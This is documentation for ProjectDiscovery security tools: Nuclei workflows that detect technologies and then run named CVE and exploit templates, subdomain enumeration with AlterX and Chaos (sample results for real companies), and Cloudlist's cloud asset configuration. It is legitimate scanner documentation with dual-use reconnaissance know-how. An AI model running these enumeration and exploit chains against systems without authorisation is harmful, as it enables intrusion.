Review some template workflow examples for Nuclei
## Generic workflows
A generic workflow that runs two templates, one to detect Jira and another to detect Confluence.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/jira-detect.yaml
- template: technologies/confluence-detect.yaml
```
## Basic conditional workflows
A condition-based workflow, which first tries to detect if Spring Boot is running on a target. If Spring Boot is found, a list of exploits is executed against it.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: security-misconfiguration/springboot-detect.yaml
subtemplates:
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2020-5410.yaml
- template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot-h2-db-rce.yaml
```
## Multi condition workflows
This template demonstrates nested workflows with Nuclei, where there are multiple levels of template chaining.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: technologies/lotus-domino-version.yaml
subtemplates:
- template: cves/xx-yy-zz.yaml
subtemplates:
- template: cves/xx-xx-xx.yaml
```
## Conditional workflows with matcher
This template detects if WordPress is running on an input host; if found, a set of targeted exploits and CVE checks is executed against it.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- template: cves/CVE-2019-6715.yaml
- template: cves/CVE-2019-9978.yaml
- template: files/wordpress-db-backup.yaml
- template: files/wordpress-debug-log.yaml
- template: files/wordpress-directory-listing.yaml
- template: files/wordpress-emergency-script.yaml
- template: files/wordpress-installer-log.yaml
- template: files/wordpress-tmm-db-migrate.yaml
- template: files/wordpress-user-enumeration.yaml
- template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/sassy-social-share.yaml
- template: vulnerabilities/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress-duplicator-path-traversal.yaml
- template: vulnerabilities/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
```
## Multiple Matcher workflow
Very similar to the last example, with multiple matcher names.
```yaml
id: workflow-multiple-matcher
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- tags: vbulletin
- name: jboss
subtemplates:
- tags: jboss
```
# Template Workflows Overview
Source: https://docs.projectdiscovery.io/templates/workflows/overview
Learn about template workflows in Nuclei
Workflows enable users to orchestrate a series of actions by setting a defined execution order for various templates. These templates are activated upon predetermined conditions, establishing a streamlined method to leverage the capabilities of nuclei tailored to the user's specific requirements. Consequently, you can craft workflows that are contingent on particular technologies or targets—such as those exclusive to WordPress or Jira—triggering these sequences only when the relevant technology is identified.
Within a workflow, all templates share a unified execution environment, which means that any named extractor from one template can be seamlessly accessed in another by simply referencing its designated name.
For those with prior knowledge of the technology stack in use, we advise constructing personalized workflows for your scans. This strategic approach not only substantially reduces the duration of scans but also enhances the quality and precision of the outcomes.
Workflows are defined with the `workflows` attribute, followed by the `template` / `subtemplates` and `tags` to execute.
```yaml
workflows:
- template: http/technologies/template-to-execute.yaml
```
**Type of workflows**
1. [Generic workflows](#generic-workflows)
2. [Conditional workflows](#conditional-workflows)
## Generic Workflows
In a generic workflow, one can define single or multiple templates to be executed from a single workflow file. Both files and directories are supported as input.
A workflow that runs all config-related templates on the list of given URLs:
```yaml
workflows:
- template: http/exposures/configs/git-config.yaml
- template: http/exposures/configs/exposed-svn.yaml
- template: http/vulnerabilities/generic/generic-env.yaml
- template: http/exposures/backups/zip-backup-files.yaml
- tags: xss,ssrf,cve,lfi
```
A workflow that runs a specific list of checks defined for your project:
```yaml
workflows:
- template: http/cves/
- template: http/exposures/
- tags: exposures
```
## Conditional Workflows
You can also create conditional templates which execute after matching the condition from a previous template. This is mostly useful for vulnerability detection and exploitation, as well as technology-based detection and exploitation. Use cases for this kind of workflow are vast and varied.
**Templates based condition check**
A workflow that executes the subtemplates when the base template matches:
```yaml
workflows:
- template: http/technologies/jira-detect.yaml
subtemplates:
- tags: jira
- template: exploits/jira/
```
**Matcher Name based condition check**
A workflow that executes the subtemplates when a matcher of the base template is found in the result:
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- template: exploits/vbulletin-exp1.yaml
- template: exploits/vbulletin-exp2.yaml
- name: jboss
subtemplates:
- template: exploits/jboss-exp1.yaml
- template: exploits/jboss-exp2.yaml
```
In a similar manner, one can create as many (and as nested) workflow checks as needed.
**Subtemplate and matcher name based multi level conditional check**
A workflow showcasing a chain of template executions that run only if the previous templates match:
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: http/technologies/lotus-domino-version.yaml
subtemplates:
- template: http/cves/2020/xx-yy-zz.yaml
subtemplates:
- template: http/cves/2020/xx-xx-xx.yaml
```
Conditional workflows are a great way to perform checks and vulnerability detection in the most efficient manner, instead of spraying all the templates on all the targets. They generally come with a good ROI on your time and are gentle on the targets as well.
## Shared Execution Context
The Nuclei engine supports a transparent workflow cookie jar and key-value sharing across templates that are part of the same workflow. Here follows an example of a workflow that extracts a value from the first template and uses it in the second, conditional one:
```yaml
id: key-value-sharing-example
info:
name: Key Value Sharing Example
author: pdteam
severity: info
workflows:
- template: template-with-named-extractor.yaml
subtemplates:
- template: template-using-named-extractor.yaml
```
For example, the following template extracts `href` links from a target web page body and makes the value available under the `extracted` key:
```yaml
# template-with-named-extractor.yaml
id: value-sharing-template1
info:
name: value-sharing-template1
author: pdteam
severity: info
http:
- path:
- "{{BaseURL}}/path1"
extractors:
- type: regex
part: body
name: extracted
regex:
- 'href="(.*)"'
group: 1
```
Finally, the second template in the workflow uses the obtained value by referencing the extractor name (`extracted`):
```yaml
# template-using-named-extractor.yaml
id: value-sharing-template2
info:
name: value-sharing-template2
author: pdteam
severity: info
http:
- raw:
- |
GET /path2 HTTP/1.1
Host: {{Hostname}}
{{extracted}}
```
# AlterX Install
Source: https://docs.projectdiscovery.io/tools/alterx/install
Learn how to install AlterX and get started
Enter the command below in a terminal to install AlterX using Go.
```bash
go install github.com/projectdiscovery/alterx/cmd/alterx@latest
```
## Installation Notes
* AlterX requires the latest version of [**Go**](https://go.dev/doc/install)
# AlterX Overview
Source: https://docs.projectdiscovery.io/tools/alterx/overview
A fast and customizable subdomain wordlist generator
**AlterX** is a high-performance, customizable subdomain wordlist generator. It fits into common subdomain enumeration pipelines by using customizable patterns, not hardcoded ones.
For more details, check out [our blog introducing AlterX](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/) or view the [GitHub repo](https://github.com/projectdiscovery/alterx).
## Features
* **Fast and Customizable**: Generate subdomain wordlists tailored to your needs.
* **Automatic Word Enrichment**: Built-in enrichment to expand results.
* **Pre-defined Variables**: Use variables to simplify your patterns.
* **Configurable Patterns**: Modify patterns to match specific enumeration pipelines.
* **STDIN / List Input**: Accepts standard input and list files for easy integration.
## Support
Need help with **AlterX**? Whether it’s installation issues or feedback on a cool use case, we want to hear from you.
* Visit the [Help](/help) section for docs.
## Join the Community
If you have questions or want to discuss ProjectDiscovery with other developers, join us on [Discord](https://discord.com/invite/projectdiscovery).
# Running AlterX
Source: https://docs.projectdiscovery.io/tools/alterx/running
Learn about running AlterX with details on variables and examples
## Basic Usage
For a detailed overview of **AlterX** options, visit the [Usage](/tools/alterx/usage) page.
If you have questions, feel free to reach out through our [Help](/help) page.
## Why AlterX?
What differentiates `alterx` from other subdomain permutation tools like `goaltdns` is its **scripting** feature. AlterX accepts patterns as input and generates subdomain permutation wordlists based on these patterns—similar to how [Nuclei](https://github.com/projectdiscovery/nuclei) works with [fuzzing-templates](https://github.com/projectdiscovery/fuzzing-templates).
Active subdomain enumeration is challenging due to the low probability of finding domains that actually exist. On a scale, this process can be visualized as:
```console
Using Wordlist < generate permutations with subdomains (goaltdns) < alterx
```
Most subdomain permutation tools rely on hardcoded patterns, generating massive wordlists that may contain millions of subdomains—making bruteforcing with tools like `dnsx` infeasible. With `alterx`, you can create patterns based on results from passive subdomain enumeration, significantly increasing the chances of finding valid subdomains and making brute-forcing more efficient.
## Variables
`alterx` uses a variable-like syntax similar to nuclei-templates. You can create custom patterns using these variables. When domains are passed as input, `alterx` evaluates the input and extracts variables from it.
### Basic Variables
```yaml
{{sub}} : subdomain prefix or left most part of a subdomain
{{suffix}} : everything except {{sub}} in subdomain name is suffix
{{tld}} : top level domain name (ex com,uk,in etc)
{{etld}} : also known as public suffix (ex co.uk, gov.in etc)
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ------------ | ------------- | ------------------- | ------------------ |
| `{{sub}}` | `api` | `admin` | `cloud` |
| `{{suffix}}` | `scanme.sh` | `dev.scanme.sh` | `scanme.co.uk` |
| `{{tld}}` | `sh` | `sh` | `uk` |
| `{{etld}}` | `-` | `-` | `co.uk` |
### Advanced Variables
```yaml
{{root}} : also known as eTLD+1 i.e only root domain (ex for api.scanme.sh => {{root}} is scanme.sh)
{{subN}} : here N is an integer (ex {{sub1}}, {{sub2}} etc.)
// {{subN}} is an advanced variable which exists depending on the input
// let's say there is a multi-level domain cloud.nuclei.scanme.sh
// in this case {{sub}} = cloud and {{sub1}} = nuclei
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ---------- | ------------- | ------------------- | ------------------ |
| `{{root}}` | `scanme.sh` | `scanme.sh` | `scanme.co.uk` |
| `{{sub1}}` | `-` | `dev` | `-` |
| `{{sub2}}` | `-` | `-` | `-` |
## Patterns
In simple terms, a pattern is a `template` that describes what type of permutations AlterX should generate.
```console
// Below are some of example patterns which can be used to generate permutations
// assuming api.scanme.sh was given as input and variable {{word}} was given as input with only one value prod
// alterx generates subdomains for below patterns
"{{sub}}-{{word}}.{{suffix}}" // ex: api-prod.scanme.sh
"{{word}}-{{sub}}.{{suffix}}" // ex: prod-api.scanme.sh
"{{word}}.{{sub}}.{{suffix}}" // ex: prod.api.scanme.sh
"{{sub}}.{{word}}.{{suffix}}" // ex: api.prod.scanme.sh
```
You can find an example of a pattern configuration file [here](https://github.com/projectdiscovery/alterx/blob/main/permutations.yaml). This file is customizable based on your security assessments or penetration test requirements.
This configuration file generates subdomain permutations for security assessments or penetration tests using customizable patterns and dynamic payloads. Patterns include dash-based, dot-based, and others. Users can create custom payload sections, such as words, region identifiers, or numbers, to suit their specific needs.
For example, a user could define a new payload section `env` with values like `prod` and `dev`, then use it in patterns like `{{env}}-{{word}}.{{suffix}}` to generate subdomains like `prod-app.example.com` and `dev-api.example.com`. This flexibility allows tailored subdomain lists for unique testing scenarios and target environments.
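A minimal sketch of such a custom configuration, assuming the `patterns`/`payloads` layout of the default permutations file (the values are illustrative):
```yaml
# custom-permutations.yaml (hypothetical file name)
patterns:
  - "{{env}}-{{word}}.{{suffix}}"

payloads:
  env:
    - prod
    - dev
  word:
    - app
    - api
```
Such a file could then be supplied via the `-ac` option mentioned below.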
The default pattern config file used for generation is stored in the `$HOME/.config/alterx/` directory, and a custom config file can also be used with the `-ac` option.
## Examples
An example of running alterx on an existing list of passive subdomains of `tesla.com` yields **10 additional new and valid subdomains**, resolved using [dnsx](https://github.com/projectdiscovery/dnsx).
```console
$ chaos -d tesla.com | alterx | dnsx
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 8312 permutations in 0.0740s
auth-global-stage.tesla.com
auth-stage.tesla.com
digitalassets-stage.tesla.com
errlog-stage.tesla.com
kronos-dev.tesla.com
mfa-stage.tesla.com
paymentrecon-stage.tesla.com
sso-dev.tesla.com
shop-stage.tesla.com
www-uat-dev.tesla.com
```
Similarly, the `-enrich` option can be used to populate known subdomains as word input to generate **target-aware permutations**.
```console
$ chaos -d tesla.com | alterx -enrich
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 662010 permutations in 3.9989s
```
You can alter the default patterns at runtime using the `-pattern` CLI option.
```console
$ chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21523 permutations in 0.7984s
```
You can also overwrite existing variable values using the `-payload` CLI option.
```console
$ alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21419 permutations in 1.1699s
```
For more information, check out the release **[blog](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/)**.
Explore other subdomain permutation tools that might integrate well with your workflow:
* [altdns](https://github.com/infosec-au/altdns)
* [goaltdns](https://github.com/subfinder/goaltdns)
* [gotator](https://github.com/Josue87/gotator)
* [ripgen](https://github.com/resyncgg/ripgen/)
* [dnsgen](https://github.com/ProjectAnte/dnsgen)
* [dmut](https://github.com/bp0lr/dmut)
* [permdns](https://github.com/hpy/permDNS)
* [str-replace](https://github.com/j3ssie/str-replace)
* [dnscewl](https://github.com/codingo/DNSCewl)
* [regulator](https://github.com/cramppet/regulator)
# AlterX Usage
Source: https://docs.projectdiscovery.io/tools/alterx/usage
Learn AlterX usage including flags and filters
## Access help
Use `alterx -h` to display all of the help options.
## AlterX options
You can use the following command to see the available flags and options:
```console
Fast and customizable subdomain wordlist generator using DSL.
Usage:
./alterx [flags]
Flags:
INPUT:
-l, -list string[] subdomains to use when creating permutations (stdin, comma-separated, file)
-p, -pattern string[] custom permutation patterns input to generate (comma-seperated, file)
-pp, -payload value custom payload pattern input to replace/use in key=value format (-pp 'word=words.txt')
OUTPUT:
-es, -estimate estimate permutation count without generating payloads
-o, -output string output file to write altered subdomain list
-ms, -max-size int Max export data size (kb, mb, gb, tb) (default mb)
-v, -verbose display verbose output
-silent display results only
-version display alterx version
CONFIG:
-config string alterx cli config file (default '$HOME/.config/alterx/config.yaml')
-en, -enrich enrich wordlist by extracting words from input
-ac string alterx permutation config file (default '$HOME/.config/alterx/permutation_v0.0.1.yaml')
-limit int limit the number of results to return (default 0)
UPDATE:
-up, -update update alterx to latest version
-duc, -disable-update-check disable automatic alterx update check
```
# Chaos Install
Source: https://docs.projectdiscovery.io/tools/chaos/install
Learn how to install Chaos and get started
Enter the command below in a terminal to install ProjectDiscovery's Chaos Client using Go.
```bash
go install -v github.com/projectdiscovery/chaos-client/cmd/chaos@latest
```
## Installation Notes
* Chaos requires the latest version of [**Go**](https://go.dev/doc/install)
# Chaos Overview
Source: https://docs.projectdiscovery.io/tools/chaos/overview
A Go Client to communicate with the Chaos API
Chaos is a comprehensive dataset of DNS entries across the internet, accessible via API. Maintained by ProjectDiscovery, it is actively updated and contains thousands of records.
Check out [our blog introducing Chaos](https://blog.projectdiscovery.io/introducing-chaos-bug-bounty-recon-data-api/), and learn more on the [Chaos website](https://chaos.projectdiscovery.io/)
## Support
Questions about using Chaos? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Chaos
Source: https://docs.projectdiscovery.io/tools/chaos/running
Learn about running Chaos with details and an example
For all of the flags and options available for **Chaos** be sure to check out the [Usage](/tools/chaos/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
In order to get subdomains for a domain, use the following command.
```bash
chaos -d uber.com -silent
restaurants.uber.com
testcdn.uber.com
approvalservice.uber.com
zoom-logs.uber.com
eastwood.uber.com
meh.uber.com
webview.uber.com
kiosk-api.uber.com
utmbeta-staging.uber.com
getmatched-staging.uber.com
logs.uber.com
dca1.cfe.uber.com
cn-staging.uber.com
frontends-primary.uber.com
eng.uber.com
guest.uber.com
kiosk-home-staging.uber.com
```
## API Key
You can get your API key by either signing up or logging in at [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io?ref=api_key).
## API Key Environment variable
You can also set the API key as an environment variable in your bash profile.
```bash
export CHAOS_KEY=CHAOS_API_KEY
```
## Notes
* The API is rate-limited to 60 requests per minute per IP
* The Chaos API **only** supports querying by domain name.
# Chaos Usage
Source: https://docs.projectdiscovery.io/tools/chaos/usage
Learn Chaos usage including flags and filters
## Access help
Use `chaos -h` to display all of the help options.
## Chaos options
| Flag | Description | Example |
| ----------------------- | ---------------------------------------- | ------------------------------- |
| `-d` | Domain to find subdomains for | `chaos -d uber.com` |
| `-count` | Show statistics for the specified domain | `chaos -d uber.com -count` |
| `-o` | File to write output to (optional) | `chaos -d uber.com -o uber.txt` |
| `-json` | Print output as json | `chaos -d uber.com -json` |
| `-key` | Chaos key for API | `chaos -key API_KEY` |
| `-dL` | File with list of domains (optional) | `chaos -dL domains.txt` |
| `-silent` | Make the output silent | `chaos -d uber.com -silent` |
| `-version` | Print current version of chaos client | `chaos -version` |
| `-verbose` | Show verbose output | `chaos -verbose` |
| `-update` | Update chaos to the latest version | `chaos -up` |
| `-disable-update-check` | Disable automatic update check | `chaos -duc` |
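These flags can be combined in a single run. For example, a possible invocation that reads domains from a file, keeps the output quiet, and writes results to disk (`domains.txt` and the output file names are placeholders):
```bash
# enumerate subdomains for every domain in domains.txt and save them to a file
chaos -dL domains.txt -silent -o subdomains.txt

# same query, emitting JSON instead of plain hostnames
chaos -dL domains.txt -silent -json -o subdomains.json
```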
# Cloudlist Install
Source: https://docs.projectdiscovery.io/tools/cloudlist/install
Learn how to install Cloudlist and get started
Enter the command below in a terminal to install ProjectDiscovery's Cloudlist using Go.
```bash
go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest
```
```bash
https://github.com/projectdiscovery/cloudlist/releases/
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* Cloudlist requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On macOS or Linux, in your terminal use
```
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/cloudlist`
# Cloudlist Overview
Source: https://docs.projectdiscovery.io/tools/cloudlist/overview
A multi-cloud tool to identify assets across cloud service providers
Cloudlist is a multi-cloud tool for getting assets from cloud providers. It is designed for blue teams to augment attack surface management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.
## Features
* List Cloud assets with multiple configurations
* Multiple Cloud providers support
* Multiple output format support
* Multiple filters support
* Highly extensible, making it easy to add new providers
* **stdout** support to work with other tools in pipelines
## Support
Questions about using Cloudlist? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Cloudlist Providers
Source: https://docs.projectdiscovery.io/tools/cloudlist/providers
Supported cloud providers
This guide offers insights into each supported provider, enabling you to leverage Cloudlist's capabilities to their fullest extent for comprehensive asset visibility and control.
## Major Cloud Providers
### AWS (Amazon Web Services)
Supported AWS Services:
* [EC2](https://aws.amazon.com/ec2/)
* [Route53](https://aws.amazon.com/route53/)
* [S3](https://aws.amazon.com/s3/)
* [Cloudfront](https://aws.amazon.com/cloudfront/)
* [ECS](https://aws.amazon.com/ecs/)
* [EKS](https://aws.amazon.com/eks/)
* [ELB](https://aws.amazon.com/elasticloadbalancing/)
* [ELBv2](https://aws.amazon.com/elasticloadbalancing/)
* [Lambda](https://aws.amazon.com/lambda/)
* [Lightsail](https://aws.amazon.com/lightsail/)
* [Apigateway](https://aws.amazon.com/api-gateway/)
**Example Config**:
Amazon Web Services can be integrated by using the following configuration block.
```yaml
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
# assume_role_name is the name of the role to assume (optional)
assume_role_name: $AWS_ASSUME_ROLE_NAME
# account_ids is the aws account ids which has similar assumed role name (optional)
account_ids:
- $AWS_ACCOUNT_ID_1
- $AWS_ACCOUNT_ID_2
```
`aws_access_key` and `aws_secret_key` can be generated in the IAM console. We recommend creating a new IAM user with `Read Only` permissions and providing the access token for the user.
Scopes Required:
The following scopes can directly be provided to the IAM user.
```
EC2 - AmazonEC2ReadOnlyAccess
Route53 - AmazonRoute53ReadOnlyAccess
S3 - AmazonS3ReadOnlyAccess
Lambda - AWSLambda_ReadOnlyAccess
ELB - ElasticLoadBalancingReadOnly
Cloudfront - CloudFrontReadOnlyAccess
```
To also support other services, a custom policy document is provided below, which can be copied directly to the role to allow correct and minimal permissions.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "RequiredReadPermissions",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"ec2:DescribeRegions",
"route53:ListHostedZones",
"route53:ListResourceRecordSets",
"s3:ListAllMyBuckets",
"lambda:ListFunctions",
"elasticloadbalancing:DescribeLoadBalancers",
"elasticloadbalancing:DescribeTargetGroups",
"elasticloadbalancing:DescribeTargetHealth",
"cloudfront:ListDistributions",
"ecs:ListClusters",
"ecs:ListServices",
"ecs:ListTasks",
"ecs:DescribeTasks",
"ecs:DescribeContainerInstances",
"eks:ListClusters",
"eks:DescribeCluster",
"apigateway:GET",
"lightsail:GetInstances",
"lightsail:GetRegions"
],
"Resource": "*"
}
]
}
```
**References:**
1. [https://docs.aws.amazon.com/IAM/latest/UserGuide/reference\_policies\_examples\_iam\_read-only-console.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_iam_read-only-console.html)
2. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_access-keys.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
3. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp\_request.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html)
* AWS Assume Role:
* [https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html](https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html)
* [https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role](https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role)
### GCP (Google Cloud Platform)
Supported GCP Services:
* [Cloud DNS](https://cloud.google.com/dns)
* [Kubernetes Engine](https://cloud.google.com/kubernetes-engine)
* [Compute Engine](https://cloud.google.com/products/compute)
* [Bucket](https://cloud.google.com/storage)
* [Cloud Functions](https://cloud.google.com/functions)
* [Cloud Run](https://cloud.google.com/run)
**Example Config:**
Google Cloud Platform can be integrated by using the following configuration block.
```yaml
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
```
`gcp_service_account_key` can be retrieved by creating a new service account. To do so, create a service account with Read Only access to the `cloudresourcemanager` and `dns` scopes in IAM. Next, generate a new account key for the service account by following the steps in Reference 2. This should give you a JSON file that can be pasted as a single line into `gcp_service_account_key`.
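As a rough sketch of that key-generation step (the service account email, project, and file names below are placeholders; exact `gcloud` usage may vary):
```bash
# create a key file for an existing read-only service account
gcloud iam service-accounts keys create key.json \
  --iam-account=cloudlist-ro@my-project.iam.gserviceaccount.com

# minify the JSON to a single line for the gcp_service_account_key field
jq -c . key.json
```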
Scopes Required: Cloud DNS, GKE
References:
1. [https://cloud.google.com/iam/docs/service-account-overview](https://cloud.google.com/iam/docs/service-account-overview)
### Azure
Supported Azure Services:
* Virtual Machines
**Example Config:**
Microsoft Azure can be integrated by using the following configuration block.
```yaml
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of the registered application of the azure account (not required if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of the registered application of the azure account (not required if using cli auth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of the registered application of the azure account (not required if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
```
`tenant_id`, `client_id`, `client_secret` can be obtained/generated from `All services` > `Azure Active Directory` > `App registrations`
`subscription_id` can be retrieved from `All services` > `Subscriptions`
To use CLI auth, set `use_cli_auth` to `true` and run `az login` in the terminal.
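For example (assuming the Azure CLI is installed and the config block above has `use_cli_auth: true`):
```bash
# authenticate the Azure CLI session, then list Azure assets with cloudlist
az login
cloudlist -provider azure
```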
References:
1. [https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli](https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli)
2. [https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az\_ad\_sp\_create\_for\_rbac](https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az_ad_sp_create_for_rbac)
3. [https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli](https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli)
### Alibaba Cloud
Supported Alibaba Cloud Services:
* ECS Instances
**Example Config:**
Alibaba Cloud can be integrated by using the following configuration block.
```yaml
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
```
Alibaba Cloud Access Key ID and Secret can be created by visiting [https://ram.console.aliyun.com/manage/ak](https://ram.console.aliyun.com/manage/ak)
References:
1. [https://www.alibabacloud.com/help/faq-detail/142101.htm](https://www.alibabacloud.com/help/faq-detail/142101.htm)
2. [https://www.alibabacloud.com/help/doc-detail/53045.htm](https://www.alibabacloud.com/help/doc-detail/53045.htm)
## VPS & PaaS Hosting Providers
### DO (DigitalOcean)
Supported DigitalOcean Services:
* Instances
**Example Config:**
Digitalocean can be integrated by using the following configuration block.
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
```
`digitalocean_token` can be generated from the Digitalocean Control Panel. We recommend only giving Read Access to the token.
References:
1. [https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/](https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/)
### SCW (Scaleway)
Supported Scaleway Services:
* Instances
**Example Config:**
Scaleway can be integrated by using the following configuration block.
```yaml
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
```
`scaleway_access_key` and `scaleway_access_token` can be generated from the Credentials Options in the Scaleway console.
References:
1. [https://www.scaleway.com/en/docs/generate-api-keys/](https://www.scaleway.com/en/docs/generate-api-keys/)
### Heroku
Supported Heroku Services:
* Applications
**Example Config:**
Heroku can be integrated by using the following configuration block.
```yaml
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
```
`heroku_api_token` can be generated from [https://dashboard.heroku.com/account/applications/authorizations/new](https://dashboard.heroku.com/account/applications/authorizations/new)
It can also be created with the Heroku CLI by running:
```bash
$ heroku authorizations:create -d "brief description of token"
Creating OAuth Authorization... done
Client:
ID: a6e98151-f242-4592-b107-25fbac5ab410
Description: brief description of token
Scope: global
Token: cf0e05d9-4eca-4948-a012-b9xxxxxxxxxx
Updated at: Fri Jun 16 2021 13:26:56 GMT-0700 (PDT) (less than a minute ago)
```
References:
1. [https://devcenter.heroku.com/articles/platform-api-quickstart#authentication](https://devcenter.heroku.com/articles/platform-api-quickstart#authentication)
### Linode
Supported Linode Services:
* Instances
**Example Config:**
Linode can be integrated by using the following configuration block.
```yaml
- provider: linode # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
```
`linode_personal_access_token` can be created from [https://cloud.linode.com/id/tokens](https://cloud.linode.com/id/tokens). Minimum scope needed is `Read Only` for `Linodes` resource.
References:
1. [https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token](https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token)
## CDN & DNS Management
### Fastly
Supported Fastly Services:
* Services
**Example Config:**
Fastly can be integrated by using the following configuration block.
```yaml
- # provider is the name of the provider
provider: fastly
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
```
